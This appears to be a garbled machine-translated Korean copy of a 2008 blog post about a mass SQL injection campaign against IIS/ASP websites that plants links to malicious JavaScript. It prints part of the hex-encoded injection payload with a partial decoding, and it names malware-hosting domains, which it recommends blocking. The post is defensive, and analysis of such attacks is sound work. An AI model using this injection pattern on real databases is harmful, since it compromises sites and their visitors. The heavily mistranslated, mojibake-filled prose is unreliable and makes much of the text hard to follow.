대량 SQL 주입

이번 주초에 나는 a를 간행했다 Microsoft Windows의 몇몇 버전에 있는 취약성에 대하여 포스트…
… 좋은 취약성은 지금 가는 대량 SQL 주입 IIS 플래트홈에 달리는 수천 수백 웹사이트를 감염한지 어느 것이에이다의 다른 원 수행되고 있다 거기.

악의 있는 원본의 자취를 위한 Google 간단한 수색을 미리 형성하는 것은 넘어서 안으로 유래한다 510,000는 페이지를 변경했다.

점점 그 데이타베이스에게서 그들을 더 빠른과 동에게, 그것 방법 또는 요구하는 만드는 후부 SQL를 사용하는 웹사이트로 - 특히 당신이 사용자 그들자신이 토론회, blogs, 의견 모양 등등에서 항상 일어나는 내용을 올려주기하 것을 허용하는 경우에 정보가 안으로 저장해 얻는 무슨을 확인하는 것도 결정적 이다. 웹사이트가 사용자에게 보여줄 무슨을 얻기 전에 저 자료가 저장하면 당신을 통제할 수 없으면 위생적으로 하면 않는 한. 이것은 SQL 주입이인 전부 대략 무슨이어, 이 통제에 있는 약점을 이용한.

현재 주사되고 있는 악의 있는 파일은 1.js이다 그러나 이것은 어떤 단계에서라도 변화한다는 것은 수 있었다는 것은 주의되어야 하는. 이 웹사이트에 방문자는 목표를 포함하여€ 많은€ 창에 근거한 신청을 위한 8개의 다른 이용에 â œtreated⠝, RealPlayer 및 iTunes이다. [[DO NOT]]당신이 감염해 얻게 아주 할 것 같기 때문에 이 위치에 연결하는 방문 위치. Trendmicro는 암호를 위해 보고 contollerâ ™s IP 등을 맞댄 그들을 통과하는 malware€ toj_agent.KAQ를 지명했다.

이 경우에는 주입 부호는 이것 같이 시작한다 (주는, 이것 완전한 부호가 아니다):

   DECLARE%20@S%20NVARCHAR (4000); 해독될 경우 SET%20@S=CAST
 (0x440045004300 Â Â
 Â 4C00410052004500200040005400200076006100720063006800610072 Â Â
 Â 00280032003500350029002C0040004300200076006100720063006800 Â Â
 Â 610072002800320035003500290020004400450043004C004100520045 Â Â
 Â 0020005400610062006C0065005F0043007500720073006F0072002000 Â Â
 Â 43005500520053004F005200200046004F0052002000730065006C0065 Â Â
 Â 0063007400200061002E006E0061006D0065002C0062002E006E006100 Â Â
 Â 6D0065002000660072006F006D0020007300790073006F0062006A0065 Â Â
 Â 00630074007300200061002C0073007900730063006F006C0075006D00 Â Â
 Â 6E00730020006200200077006800650072006500200061002E00690064 Â Â
 Â 003D0062002E0069006400200061006E006400200061002E0078007400 Â Â
 Â 7900700065003D00270075002700200061006E0064002000280062002E Â Â
  00780074007900700065003D003900390020006F007200200062002E00  € Â

 780074007900700065003D003300350020006â는 ¦ 된다:

  Â는 varchar varchar (255) '@C가 (255) sysobjects a'syscolumns b Â
  Â에서 추려낸 a.name'b.name를 위한 Table_Cursor    커서를
 곳에 a.id=b.id와 a.xtype='u와 선언하는 @T를 선언한다 (b.xtype=99 또는 b.xtype=35
    또는 b†¦

무엇이 그 결과로 일어나는가? 그것은 데이타베이스에 있는 모든 원본 분야를 찾아내고 악의 있는 javascript에 당신의 웹사이트에 그들을 자동으로 표시한 그들 각자에 연결을 추가한다. 일어난 무엇이 이렇게 근본적으로 그들의 SQL 주입 부호를 올려주기하기 위하여 공격기가 querystring (기사 ID 제품 ID, 등등 cetera와 같은 동적인 가치) 매개변수의 아무 유형나 포함하는 ASP 또는 ASPX 페이지를 찾고 저것을 이용하도록다는 것을 시도했다는 것을 이었다.

이제까지는 3개의 다른 영역은 악의 있는 만족한 â를" 접대하는 이용되었다€ nmidahena.com, aspder.com 그리고 nihaorr1.com. 이 위치에서 적재해 얻는 파일의 세트가 있다 온라인 도박 트로이 사람을 설치하기 위하여 다른 이용을 이용하도록 시도하는. 지금 모든 영역에 처음 이용 페이지는 접근하기 어렵다 그러나 저것은 변화할 수 있었다. So if you’re a firewall administrator we recommend you to block access to them.

I would recommend that Administrators block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.

Info sourced from f-secure

Popularity: 3%

Written by Patrick S. Read more great feeds at is source WEBSITE
no comments.
Read more articles on otherSoftware and MS News.

• [+] Digg: Feature this article
• [+] Del.icio.us: Bookmark this article
• [+] Furl: Bookmark this article

Related articles

• How to install Live Mesh client on non-US systems (April 26th, 2008)
• XP Service Pack 3 (April 26th, 2008)
• Check out Windows Speech Recognition Macros (April 26th, 2008)
• Taking a Closer Look at the Origami Experience 2.0 (April 26th, 2008)
• Windows Server, SQL Server & Visual Studio Launch 2008 Resources (April 25th, 2008)